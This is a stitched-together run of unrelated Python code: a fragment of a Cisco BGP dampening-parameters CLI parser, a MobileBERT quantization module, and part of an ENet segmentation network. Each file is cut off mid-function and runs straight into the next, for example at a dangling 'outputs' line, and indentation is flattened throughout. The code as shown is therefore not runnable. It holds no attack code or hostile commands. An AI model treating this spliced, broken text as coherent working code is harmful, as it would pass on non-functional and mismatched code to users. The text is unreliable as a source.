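    # A minimal usage sketch (not part of the original module): with a pre-collected
    # CLI output the parser can be exercised without contacting the device, e.g.
    #
    #     raw = '''
    #     Template:PEER-POLICY, index:1.
    #     Local policies:0x8002069C603, Inherited polices:0x0
    #     Local disable policies:0x0, Inherited disable policies:0x0
    #     Locally configured policies:
    #       route-map test in
    #       send-community both
    #     Inherited policies:
    #     '''
    #     parsed = ShowIpBgpTemplatePeerPolicy(device=device).cli(output=raw)
    #     # parsed['peer_policy']['PEER-POLICY']['route_map_name_in'] == 'test'
    #
    # where `device` is assumed to be an already-connected pyATS device object.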
#-------------------------------------------------------------------------------
# ==========================================
# Schema for:
# * 'show ip bgp all dampening parameters'
# ==========================================
class ShowIpBgpAllDampeningParametersSchema(MetaParser):
''' Schema for "show ip bgp all dampening parameters" '''
schema = {
'vrf':
{Any():
{Optional('address_family'):
{Any():
{Optional('dampening'): bool,
Optional('dampening_decay_time'): int,
Optional('dampening_half_life_time'): int,
Optional('dampening_reuse_time'): int,
Optional('dampening_max_suppress_penalty'): int,
Optional('dampening_suppress_time'): int,
Optional('dampening_max_suppress_time'): int,
},
},
},
},
}
# ==========================================
# Parser for:
# * 'show ip bgp all dampening parameters'
# ==========================================
class ShowIpBgpAllDampeningParameters(ShowIpBgpAllDampeningParametersSchema):
''' Parser for "show ip bgp all dampening parameters" '''
cli_command = 'show ip bgp all dampening parameters'
def cli(self, output=None):
if output is None:
out = self.device.execute(self.cli_command)
else:
out = output
p1 = re.compile(r'^\s*For +address +family:'
' +(?P<address_family>[a-zA-Z0-9\-\s]+)$')
p2 = re.compile(r'^\s*dampening'
' +(?P<dampening_val>[\d\s\S]+)$')
p3 = re.compile(r'^\s*Half-life +time\s*:'
' +(?P<half_life_time>[\d]+)'
' mins +Decay +Time +: +(?P<decay_time>[\d]+) +secs$')
p4 = re.compile(r'^\s*Max +suppress +penalty:'
'\s+(?P<max_suppress_penalty>[0-9]+)'
'\s+Max +suppress +time:\s+(?P<max_suppress_time>[\d]+) +mins$')
p5 = re.compile(r'^\s*Suppress +penalty +:'
' +(?P<suppress_penalty>[\d]+)'
' +Reuse +penalty +: +(?P<reuse_penalty>[\d]+)$')
p6 = re.compile(r'^\s*% +dampening +not +enabled +for +base$')
p7 = re.compile(r'^\s*For +vrf: +(?P<vrf_name>[\w\d]+)$')
p8 = re.compile(r'^\s*% +dampening +not +enabled +for +vrf +(?P<vrf_name>[\d\w]+)$')
# Init vars
parsed_dict = {}
vrf_name = 'default'
for line in out.splitlines():
if line.strip():
line = line.rstrip()
else:
continue
# For address family: IPv4 Unicast
m = p1.match(line)
if m:
af_name = m.groupdict()['address_family'].lower()
if 'vrf' not in parsed_dict:
parsed_dict['vrf'] = {}
if vrf_name not in parsed_dict['vrf']:
parsed_dict['vrf'][vrf_name] = {}
if 'address_family' not in parsed_dict['vrf'][vrf_name]:
parsed_dict['vrf'][vrf_name]['address_family'] = {}
if af_name not in parsed_dict['vrf'][vrf_name]['address_family']:
parsed_dict['vrf'][vrf_name]['address_family'][af_name] = {}
continue
# dampening 35 200 200 70
m = p2.match(line)
if m:
dampening_val = m.groupdict()['dampening_val']
if vrf_name not in parsed_dict['vrf']:
parsed_dict['vrf'][vrf_name] = {}
if 'address_family' not in parsed_dict['vrf'][vrf_name]:
parsed_dict['vrf'][vrf_name]['address_family'] = {}
if af_name not in parsed_dict['vrf'][vrf_name]['address_family']:
parsed_dict['vrf'][vrf_name]['address_family'][af_name] = {}
parsed_dict['vrf'][vrf_name]['address_family'][af_name]['dampening'] = True
continue
# Half-life time : 35 mins Decay Time : 4200 secs
m = p3.match(line)
if m:
half_life_time = int(m.groupdict()['half_life_time'])*60
decay_time = int(m.groupdict()['decay_time'])
# Repository: Ayyub29/transformer-quantization (GitHub stars: 1-10)
# Copyright (c) 2021 Qualcomm Technologies, Inc.
# All Rights Reserved.
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.models.mobilebert.modeling_mobilebert import (
BaseModelOutputWithPooling,
BottleneckLayer,
FFNLayer,
MobileBertLayer,
MobileBertSelfAttention,
MobileBertSelfOutput,
NoNorm,
)
from transformers.modeling_outputs import SequenceClassifierOutput
from transformers.modeling_utils import ModuleUtilsMixin
from quantization.autoquant_utils import quantize_model, quantize_module_list
from quantization.base_quantized_classes import QuantizedActivation, FP32Acts
from quantization.base_quantized_model import QuantizedModel
from quantization.hijacker import QuantizationHijacker
from quantization.range_estimators import RangeEstimators, OptMethod
from utils.tb_utils import _tb_advance_global_step, _tb_advance_token_counters, _tb_hist
from utils.utils import DotDict
DEFAULT_QUANT_DICT = {
# Embeddings
'sum_input_pos_embd': True,
'sum_token_type_embd': True,
# Attention
'attn_scores': True,
'attn_probs': True,
'attn_probs_n_bits_act': None,
'attn_probs_act_range_method': None,
'attn_probs_act_range_options': None,
'attn_output': True,
# Residual connections
'res_self_output': True,
'res_output': True,
'res_output_bottleneck': True,
'res_ffn_output': True,
}
def _make_quant_dict(partial_dict):
quant_dict = DEFAULT_QUANT_DICT.copy()
quant_dict.update(partial_dict)
return DotDict(quant_dict)
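# A minimal usage sketch (not part of the original module): a partial dict only
# overrides the listed keys; every other key keeps its DEFAULT_QUANT_DICT value
# and is reachable via attribute lookup on the returned DotDict, e.g.
#
#     qd = _make_quant_dict({'attn_probs': False})
#     assert qd.attn_probs is False and qd.attn_scores is True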
class QuantNoNorm(QuantizationHijacker):
def __init__(self, org_model, *args, activation=None, **kwargs):
super().__init__(*args, activation=activation, **kwargs)
self.weight = org_model.weight
self.bias = org_model.bias
def forward(self, x, offsets=None):
weight, bias = self.weight, self.bias
if self._quant_w:
weight = self.weight_quantizer(weight)
bias = self.weight_quantizer(bias)
res = x * weight + bias
res = self.quantize_activations(res)
return res
class QuantizedMobileBertEmbeddings(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.trigram_input = org_model.trigram_input
self.embedding_size = org_model.embedding_size
self.hidden_size = org_model.hidden_size
# quantized modules
self.word_embeddings = quantize_model(org_model.word_embeddings, **quant_params)
self.position_embeddings = quantize_model(org_model.position_embeddings, **quant_params)
self.token_type_embeddings = quantize_model(org_model.token_type_embeddings, **quant_params)
self.embedding_transformation = quantize_model(
org_model.embedding_transformation, **quant_params
)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
self.dropout = org_model.dropout
position_ids = org_model.position_ids
if position_ids is not None:
self.register_buffer('position_ids', position_ids)
else:
self.position_ids = position_ids
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.sum_input_pos_embd_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.sum_input_pos_embd
else FP32Acts()
)
self.sum_token_type_embd_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.sum_token_type_embd
else FP32Acts()
)
def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
if input_ids is not None:
input_shape = input_ids.size()
else:
input_shape = inputs_embeds.size()[:-1]
seq_length = input_shape[1]
if position_ids is None:
position_ids = self.position_ids[:, :seq_length]
if token_type_ids is None:
token_type_ids = torch.zeros(
input_shape, dtype=torch.long, device=self.position_ids.device
)
if inputs_embeds is None:
inputs_embeds = self.word_embeddings(input_ids) # (B, T, 128)
if self.trigram_input:
# From the paper MobileBERT: a Compact Task-Agnostic BERT for Resource-Limited
# Devices (https://arxiv.org/abs/2004.02984)
#
# The embedding table in BERT models accounts for a substantial proportion of model size. To compress
# the embedding layer, we reduce the embedding dimension to 128 in MobileBERT.
# Then, we apply a 1D convolution with kernel size 3 on the raw token embedding to produce a 512
# dimensional output.
inputs_embeds = torch.cat(
[
F.pad(inputs_embeds[:, 1:], [0, 0, 0, 1, 0, 0], value=0),
inputs_embeds,
F.pad(inputs_embeds[:, :-1], [0, 0, 1, 0, 0, 0], value=0),
],
dim=2,
) # (B, T, 384)
if self.trigram_input or self.embedding_size != self.hidden_size:
inputs_embeds = self.embedding_transformation(inputs_embeds) # (B, T, 512)
# Add positional embeddings and token type embeddings, then layer # normalize and
# perform dropout.
position_embeddings = self.position_embeddings(position_ids)
token_type_embeddings = self.token_type_embeddings(token_type_ids)
embeddings = self.sum_input_pos_embd_act_quantizer(inputs_embeds + position_embeddings)
embeddings = self.sum_token_type_embd_act_quantizer(embeddings + token_type_embeddings)
embeddings = self.LayerNorm(embeddings)
embeddings = self.dropout(embeddings)
return embeddings
class QuantizedMobileBertSelfAttention(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.num_attention_heads = org_model.num_attention_heads
self.attention_head_size = org_model.attention_head_size
self.all_head_size = org_model.all_head_size
# quantized modules
self.query = quantize_model(org_model.query, **quant_params)
self.key = quantize_model(org_model.key, **quant_params)
self.value = quantize_model(org_model.value, **quant_params)
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.attn_scores_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.attn_scores else FP32Acts()
)
quant_params_ = quant_params.copy()
if self.quant_dict.attn_probs_n_bits_act is not None:
quant_params_['n_bits_act'] = self.quant_dict.attn_probs_n_bits_act
if self.quant_dict.attn_probs_act_range_method is not None:
quant_params_['act_range_method'] = RangeEstimators[
self.quant_dict.attn_probs_act_range_method
]
if self.quant_dict.attn_probs_act_range_options is not None:
act_range_options = self.quant_dict.attn_probs_act_range_options
if 'opt_method' in act_range_options and not isinstance(act_range_options['opt_method'],
OptMethod):
act_range_options['opt_method'] = OptMethod[act_range_options['opt_method']]
quant_params_['act_range_options'] = act_range_options
self.attn_probs_act_quantizer = (
QuantizedActivation(**quant_params_) if self.quant_dict.attn_probs else FP32Acts()
)
self.attn_output_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.attn_output else FP32Acts()
)
def transpose_for_scores(self, x):
new_x_shape = x.size()[:-1] + (self.num_attention_heads, self.attention_head_size)
x = x.view(*new_x_shape)
return x.permute(0, 2, 1, 3)
def forward(
self,
query_tensor,
key_tensor,
value_tensor,
attention_mask=None,
head_mask=None,
output_attentions=None,
):
mixed_query_layer = self.query(query_tensor)
mixed_key_layer = self.key(key_tensor)
mixed_value_layer = self.value(value_tensor)
query_layer = self.transpose_for_scores(mixed_query_layer)
key_layer = self.transpose_for_scores(mixed_key_layer)
value_layer = self.transpose_for_scores(mixed_value_layer)
# Take the dot product between "query" and "key" to get the raw attention scores.
attention_scores = torch.matmul(query_layer, key_layer.transpose(-1, -2))
attention_scores = self.attn_scores_act_quantizer(attention_scores)
# NOTE: factor 1/d^0.5 can be absorbed into the previous act. quant. delta
attention_scores = attention_scores / math.sqrt(self.attention_head_size)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in BertModel forward() function)
attention_scores = attention_scores + attention_mask
# Normalize the attention scores to probabilities.
attention_probs = nn.Softmax(dim=-1)(attention_scores)
attention_probs = self.attn_probs_act_quantizer(attention_probs)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.dropout(attention_probs)
# Mask heads if we want to
if head_mask is not None:
attention_probs = attention_probs * head_mask
context_layer = torch.matmul(attention_probs, value_layer)
context_layer = self.attn_output_act_quantizer(context_layer)
context_layer = context_layer.permute(0, 2, 1, 3).contiguous()
new_context_layer_shape = context_layer.size()[:-2] + (self.all_head_size,)
context_layer = context_layer.view(*new_context_layer_shape)
outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
return outputs
class QuantizedMobileBertSelfOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.use_bottleneck = org_model.use_bottleneck
# quantized modules
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
if not self.use_bottleneck:
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_self_output else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
if not self.use_bottleneck:
layer_outputs = self.dropout(layer_outputs)
_tb_advance_token_counters(self, layer_outputs)
_tb_hist(self, layer_outputs, 'res_self_output_h')
_tb_hist(self, residual_tensor, 'res_self_output_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, residual_tensor, 'res_self_output_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
def quantize_intermediate(org_module, **quant_params):
m_dense = org_module.dense
m_act = org_module.intermediate_act_fn
if not isinstance(m_act, nn.Module):
if m_act == F.gelu:
m_act = nn.GELU()
elif m_act == F.relu:
m_act = nn.ReLU()
else:
raise NotImplementedError()
return quantize_model(nn.Sequential(m_dense, m_act), **quant_params)
class QuantizedOutputBottleneck(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
self.dropout = org_model.dropout
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params)
if self.quant_dict.res_output_bottleneck
else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
layer_outputs = self.dropout(layer_outputs)
_tb_advance_token_counters(self, layer_outputs)
_tb_hist(self, layer_outputs, 'res_layer_h')
_tb_hist(self, residual_tensor, 'res_layer_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, layer_outputs, 'res_layer_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
class QuantizedMobileBertOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy attributes
self.use_bottleneck = org_model.use_bottleneck
# quantized modules
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
if not self.use_bottleneck:
self.dropout = org_model.dropout
else:
self.bottleneck = QuantizedOutputBottleneck(
org_model=org_model.bottleneck, **quant_params
)
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_output else FP32Acts()
)
def forward(self, intermediate_states, residual_tensor_1, residual_tensor_2):
layer_output = self.dense(intermediate_states)
if not self.use_bottleneck:
layer_output = self.dropout(layer_output)
layer_output = layer_output + residual_tensor_1
layer_output = self.res_act_quantizer(layer_output)
layer_output = self.LayerNorm(layer_output)
else:
_tb_advance_token_counters(self, layer_output)
_tb_hist(self, layer_output, 'res_interm_h')
_tb_hist(self, residual_tensor_1, 'res_interm_x')
layer_output = layer_output + residual_tensor_1
_tb_hist(self, layer_output, 'res_interm_x_h')
layer_output = self.res_act_quantizer(layer_output)
layer_output = self.LayerNorm(layer_output)
layer_output = self.bottleneck(layer_output, residual_tensor_2)
_tb_advance_global_step(self)
return layer_output
class QuantizedBottleneckLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
def forward(self, hidden_states):
layer_input = self.dense(hidden_states)
layer_input = self.LayerNorm(layer_input)
return layer_input
class QuantizedFFNOutput(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.dense = quantize_model(org_model.dense, **quant_params)
assert isinstance(org_model.LayerNorm, NoNorm)
self.LayerNorm = QuantNoNorm(org_model.LayerNorm, **quant_params)
# activation quantizers
self.quant_dict = _make_quant_dict(quant_params['quant_dict'])
self.res_act_quantizer = (
QuantizedActivation(**quant_params) if self.quant_dict.res_ffn_output else FP32Acts()
)
def forward(self, hidden_states, residual_tensor):
layer_outputs = self.dense(hidden_states)
_tb_advance_token_counters(self, layer_outputs)
num_ffn = self.ffn_idx + 1
_tb_hist(self, layer_outputs, f'res_ffn{num_ffn}_h')
_tb_hist(self, residual_tensor, f'res_ffn{num_ffn}_x')
layer_outputs = layer_outputs + residual_tensor
_tb_hist(self, layer_outputs, f'res_ffn{num_ffn}_x_h')
layer_outputs = self.res_act_quantizer(layer_outputs)
layer_outputs = self.LayerNorm(layer_outputs)
_tb_advance_global_step(self)
return layer_outputs
class QuantizedFFNLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
self.intermediate = quantize_intermediate(org_model.intermediate, **quant_params)
self.output = QuantizedFFNOutput(org_model.output, **quant_params)
def forward(self, hidden_states):
intermediate_output = self.intermediate(hidden_states)
layer_outputs = self.output(intermediate_output, hidden_states)
return layer_outputs
class QuantizedMobileBertLayer(QuantizedModel):
def __init__(self, org_model, **quant_params):
super().__init__()
# copy
self.use_bottleneck = org_model.use_bottleneck
self.num_feedforward_networks = org_model.num_feedforward_networks
# quantized modules
attention_specials = {
MobileBertSelfAttention: QuantizedMobileBertSelfAttention,
MobileBertSelfOutput: QuantizedMobileBertSelfOutput,
}
self.attention = quantize_model(
org_model.attention, specials=attention_specials, **quant_params
)
self.intermediate = quantize_intermediate(org_model.intermediate, **quant_params)
self.output = QuantizedMobileBertOutput(org_model.output, **quant_params)
if self.use_bottleneck:
self.bottleneck = quantize_model(
org_model.bottleneck,
specials={BottleneckLayer: QuantizedBottleneckLayer},
**quant_params,
)
if getattr(org_model, 'ffn', None) is not None:
self.ffn = quantize_module_list(
org_model.ffn, specials={FFNLayer: QuantizedFFNLayer}, **quant_params
)
def forward(
self,
hidden_states,
attention_mask=None,
head_mask=None,
output_attentions=None,
):
if self.use_bottleneck:
query_tensor, key_tensor, value_tensor, layer_input = self.bottleneck(hidden_states)
else:
query_tensor, key_tensor, value_tensor, layer_input = [hidden_states] * 4
self_attention_outputs = self.attention(
query_tensor,
key_tensor,
value_tensor,
layer_input,
attention_mask,
head_mask,
output_attentions=output_attentions,
)
attention_output = self_attention_outputs[0]
s = (attention_output,)
        outputs
import torch.nn as nn
import torch
from torch.autograd import Variable
class InitialBlock(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size=3,
padding=0,
bias=False,
relu=True):
super(InitialBlock,self).__init__()
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - As stated above the number of output channels for this
# branch is the total minus 3, since the remaining channels come from
# the extension branch
self.main_branch = nn.Conv2d(
in_channels,
out_channels - 3,
kernel_size=kernel_size,
stride=2,
padding=padding,
bias=bias)
# Extension branch
self.ext_branch = nn.MaxPool2d(kernel_size, stride=2, padding=padding)
# Initialize batch normalization to be used after concatenation
self.batch_norm = nn.BatchNorm2d(out_channels)
# PReLU layer to apply after concatenating the branches
self.out_prelu = activation
def forward(self, x):
main = self.main_branch(x)
ext = self.ext_branch(x)
# Concatenate branches
out = torch.cat((main, ext), 1)
# Apply batch normalization
out = self.batch_norm(out)
return self.out_prelu(out)
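# A quick shape sanity check (not part of the original file): for a 3-channel
# input the main branch contributes out_channels - 3 feature maps and the
# max-pooling branch passes the 3 input channels through, so the concatenation
# has exactly out_channels channels at half the spatial resolution, e.g.
#
#     block = InitialBlock(3, 16, padding=1)
#     x = torch.randn(1, 3, 512, 512)
#     assert block(x).shape == (1, 16, 256, 256)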
class RegularBottleneck(nn.Module):
def __init__(self,
channels,
internal_ratio=4,
kernel_size=3,
padding=0,
dilation=1,
asymmetric=False,
dropout_prob=0,
bias=False,
relu=True):
super(RegularBottleneck,self).__init__()
        # Check if the internal_ratio parameter is within the expected range
        # [1, channels]
        if internal_ratio <= 1 or internal_ratio > channels:
            raise RuntimeError("Value out of range. Expected value in the "
                               "interval [1, {0}], got internal_ratio={1}."
                               .format(channels, internal_ratio))
internal_channels = channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - shortcut connection
# Extension branch - 1x1 convolution, followed by a regular, dilated or
# asymmetric convolution, followed by another 1x1 convolution, and,
# finally, a regularizer (spatial dropout). Number of channels is constant.
# 1x1 projection convolution
self.ext_conv1 = nn.Sequential(
nn.Conv2d(
channels,
internal_channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
        # If the convolution is asymmetric we split the main convolution in
        # two. E.g. for a 5x5 asymmetric convolution we have two convolutions:
        # the first is 5x1 and the second is 1x5.
if asymmetric:
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=(kernel_size, 1),
stride=1,
padding=(padding, 0),
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation,
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=(1, kernel_size),
stride=1,
padding=(0, padding),
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
else:
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=1,
padding=padding,
dilation=dilation,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels,
channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
# PReLU layer to apply after adding the branches
self.out_prelu = activation
def forward(self, x):
# Main branch shortcut
main = x
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Add main and extension branches
out = main + ext
return self.out_prelu(out)
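# Illustrative sanity check (not part of the original source; assumes torch is available):
# a RegularBottleneck preserves both the channel count and the spatial size, whether the
# middle convolution is regular, dilated, or factorized into 5x1 and 1x5 (asymmetric).
def _regular_bottleneck_shape_check():
    block = RegularBottleneck(64, kernel_size=5, padding=2, asymmetric=True, dropout_prob=0.1)
    x = torch.randn(1, 64, 32, 32)
    out = block(x)
    assert out.shape == x.shape
    return out.shape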
class DownsamplingBottleneck(nn.Module):
def __init__(self,
in_channels,
out_channels,
internal_ratio=4,
kernel_size=3,
padding=0,
return_indices=False,
dropout_prob=0,
bias=False,
relu=True):
super(DownsamplingBottleneck,self).__init__()
# Store parameters that are needed later
self.return_indices = return_indices
        # Check that the internal_ratio parameter is within the expected
        # range [1, in_channels]
if internal_ratio <= 1 or internal_ratio > in_channels:
raise RuntimeError("Value out of range. Expected value in the "
"interval [1, {0}], got internal_scale={1}. "
.format(in_channels, internal_ratio))
internal_channels = in_channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
# Main branch - max pooling followed by feature map (channels) padding
self.main_max1 = nn.MaxPool2d(
kernel_size,
stride=2,
padding=padding,
return_indices=return_indices)
        # Extension branch - 2x2 strided convolution, followed by a regular
        # convolution, followed by a 1x1 expansion convolution. The number of
        # channels grows from in_channels to out_channels.
# 2x2 projection convolution with stride 2
self.ext_conv1 = nn.Sequential(
nn.Conv2d(
in_channels,
internal_channels,
kernel_size=2,
stride=2,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# Convolution
self.ext_conv2 = nn.Sequential(
nn.Conv2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=1,
padding=padding,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels,
out_channels,
kernel_size=1,
stride=1,
bias=bias), nn.BatchNorm2d(out_channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
        # PReLU layer to apply after adding the branches
self.out_prelu = activation
def forward(self, x):
# Main branch shortcut
if self.return_indices:
main, max_indices = self.main_max1(x)
else:
main = self.main_max1(x)
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Main branch channel padding
n, ch_ext, h, w = ext.size()
ch_main = main.size()[1]
padding = Variable(torch.zeros(n, ch_ext - ch_main, h, w))
# Before concatenating, check if main is on the CPU or GPU and
# convert padding accordingly
if main.is_cuda:
padding = padding.cuda()
# Concatenate
main = torch.cat((main, padding), 1)
# Add main and extension branches
out = main + ext
        # Only return the pooling indices when they were requested
        if self.return_indices:
            return self.out_prelu(out), max_indices
        return self.out_prelu(out)
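# Illustrative sanity check (not part of the original source): a DownsamplingBottleneck halves
# the spatial size, grows the channel count by zero-padding the main branch, and can return the
# max-pooling indices needed later by the matching UpsamplingBottleneck.
def _downsampling_bottleneck_shape_check():
    block = DownsamplingBottleneck(16, 64, padding=1, return_indices=True, dropout_prob=0.01)
    x = torch.randn(1, 16, 64, 64)
    out, indices = block(x)
    assert out.shape == (1, 64, 32, 32)
    return out.shape, indices.shape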
class UpsamplingBottleneck(nn.Module):
def __init__(self,
in_channels,
out_channels,
internal_ratio=4,
kernel_size=3,
padding=0,
dropout_prob=0,
bias=False,
relu=True):
super(UpsamplingBottleneck,self).__init__()
        # Check that the internal_ratio parameter is within the expected
        # range [1, in_channels]
if internal_ratio <= 1 or internal_ratio > in_channels:
raise RuntimeError("Value out of range. Expected value in the "
"interval [1, {0}], got internal_scale={1}. "
.format(in_channels, internal_ratio))
internal_channels = in_channels // internal_ratio
if relu:
activation = nn.ReLU()
else:
activation = nn.PReLU()
        # Main branch - 1x1 convolution followed by max unpooling using the
        # indices saved by the matching downsampling block
self.main_conv1 = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(out_channels))
# Remember that the stride is the same as the kernel_size, just like
# the max pooling layers
self.main_unpool1 = nn.MaxUnpool2d(kernel_size=2)
        # Extension branch - 1x1 projection convolution, followed by a
        # transposed convolution, followed by a 1x1 expansion convolution.
        # The number of channels shrinks from in_channels to out_channels.
# 1x1 projection convolution with stride 1
self.ext_conv1 = nn.Sequential(
nn.Conv2d(
in_channels, internal_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(internal_channels), activation)
# Transposed convolution
self.ext_conv2 = nn.Sequential(
nn.ConvTranspose2d(
internal_channels,
internal_channels,
kernel_size=kernel_size,
stride=2,
padding=padding,
output_padding=1,
bias=bias), nn.BatchNorm2d(internal_channels), activation)
# 1x1 expansion convolution
self.ext_conv3 = nn.Sequential(
nn.Conv2d(
internal_channels, out_channels, kernel_size=1, bias=bias),
nn.BatchNorm2d(out_channels), activation)
self.ext_regul = nn.Dropout2d(p=dropout_prob)
        # PReLU layer to apply after adding the branches
self.out_prelu = activation
def forward(self, x, max_indices):
# Main branch shortcut
main = self.main_conv1(x)
main = self.main_unpool1(main, max_indices)
# Extension branch
ext = self.ext_conv1(x)
ext = self.ext_conv2(ext)
ext = self.ext_conv3(ext)
ext = self.ext_regul(ext)
# Add main and extension branches
out = main + ext
return self.out_prelu(out)
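# Illustrative pairing (not part of the original source): the indices saved by a
# DownsamplingBottleneck drive the MaxUnpool2d inside the matching UpsamplingBottleneck,
# restoring the spatial size that the downsampling block halved.
def _down_up_pairing_check():
    down = DownsamplingBottleneck(16, 64, padding=1, return_indices=True, dropout_prob=0.01)
    up = UpsamplingBottleneck(64, 16, padding=1, dropout_prob=0.01)
    x = torch.randn(1, 16, 64, 64)
    pooled, indices = down(x)
    restored = up(pooled, indices)
    assert restored.shape == x.shape
    return restored.shape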
class ENet(nn.Module):
"""Generate the ENet model.
Keyword arguments:
- num_classes (int): the number of classes to segment.
- encoder_relu (bool, optional): When ``True`` ReLU is used as the
activation function in the encoder blocks/layers; otherwise, PReLU
is used. Default: False.
- decoder_relu (bool, optional): When ``True`` ReLU is used as the
activation function in the decoder blocks/layers; otherwise, PReLU
is used. Default: True.
"""
def __init__(self, num_classes, encoder_relu=False, decoder_relu=True):
super(ENet,self).__init__()
self.initial_block = InitialBlock(3, 16, padding=1, relu=encoder_relu)
# Stage 1 - Encoder
self.downsample1_0 = DownsamplingBottleneck(
16,
64,
padding=1,
return_indices=True,
dropout_prob=0.01,
relu=encoder_relu)
self.regular1_1 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_2 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_3 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
self.regular1_4 = RegularBottleneck(
64, padding=1, dropout_prob=0.01, relu=encoder_relu)
# Stage 2 - Encoder
self.downsample2_0 = DownsamplingBottleneck(
64,
128,
padding=1,
return_indices=True,
dropout_prob=0.1,
relu=encoder_relu)
self.regular2_1 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated2_2 = RegularBottleneck(
128, dilation=2, padding=2, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric2_3 = RegularBottleneck(
128,
kernel_size=5,
padding=2,
asymmetric=True,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated2_4 = RegularBottleneck(
128, dilation=4, padding=4, dropout_prob=0.1, relu=encoder_relu)
self.regular2_5 = RegularBottleneck(
128, padding=1, dropout_prob=0.1, relu=encoder_relu)
self.dilated2_6 = RegularBottleneck(
128, dilation=8, padding=8, dropout_prob=0.1, relu=encoder_relu)
self.asymmetric2_7 = RegularBottleneck(
128,
kernel_size=5,
asymmetric=True,
padding=2,
dropout_prob=0.1,
relu=encoder_relu)
self.dilated2_8 = RegularBottleneck(
